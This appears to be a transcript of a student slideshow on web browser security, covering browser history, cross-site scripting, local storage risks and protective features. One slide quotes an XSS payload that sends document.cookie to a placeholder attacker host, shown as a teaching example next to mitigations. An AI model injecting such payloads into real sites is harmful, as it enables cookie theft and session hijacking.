1 / 11

Web Browser Security

Web Browser Security. By Robert Sellers Brian Bauer. Relevance Use Internet daily Transmit personal information, needs to be secure Content History Security Issues and Mitigation Protection. Introduction. First ever browser – WorldWideWeb (1990) Created at CERN by Tim Berners-Lee

engel
Download Presentation

Web Browser Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Web Browser Security By Robert Sellers Brian Bauer

  2. Relevance • Use Internet daily • Transmit personal information, needs to be secure • Content • History • Security Issues and Mitigation • Protection Introduction

  3. First ever browser – WorldWideWeb (1990) • Created at CERN by Tim Berners-Lee • Used internally, no real security threats • Would only display HTML text • Allowed downloading of other file types History

  4. Mosaic (1993) • First browser with a GUI • Lead to increase in Internet popularity • Netscape Navigator (1994) • Nearly disappeared by 2000 • Internet Explorer (1995) • Held as much as 95% of the market History

  5. Safari (2003) • Apple’s browser • Firefox (2004) • Open source • Chrome (2008) • Rapid increase in market share History

  6. Increase in security issues • Complexity of web sites and browsers • Size of the Internet • Anyone can access • Uses of Internet • Online banking • Shopping • More sharing of sensitive data Security Issues

  7. Cross Site Scripting (XSS) • Takes advantage of complex, dynamic web pages • Injects client side scripts, HTML • Can lead to cookie theft, browser redirection, untrusted content • Nearly 80% of vulnerabilities in 2007 (Symantec)  Security Issues

  8. Example http://portal.example/index.php?sessionid=12312312& username=<script>document.location='http://attackerhost.example/cgi-bin/ • cookiesteal.cgi?'+document.cookie</script> • source: http://projects.webappsec.org/w/page/13246920/Cross-Site-Scripting • XSS Mitigation • Disable scripting • Sanitize input, escape HTML/scripts  • No script access to cookies  Security Issues

  9. Local Storage • Form data • Login credentials • Encryption - HTTP vs HTTPS • Packet sniffing -> session hijacking, password stealing Security Issues

  10. Incognito Mode (Google Chrome) • Allows user to switch between multiple privacy settings with the click of a button • Can be activated in one window/tab but not others  • Browser Guards • Modern browsers will prevent users from visiting malicious sites • Two main methods • List of reported malicious sites • Algorithm to detect malicious code on a site • This can protect from viruses, phishing, and other threats Protecting Yourself Online

  11. Browsers can only do so much • Much security is responsibility of web designers • Internet users should be aware of issues Conclusion

More Related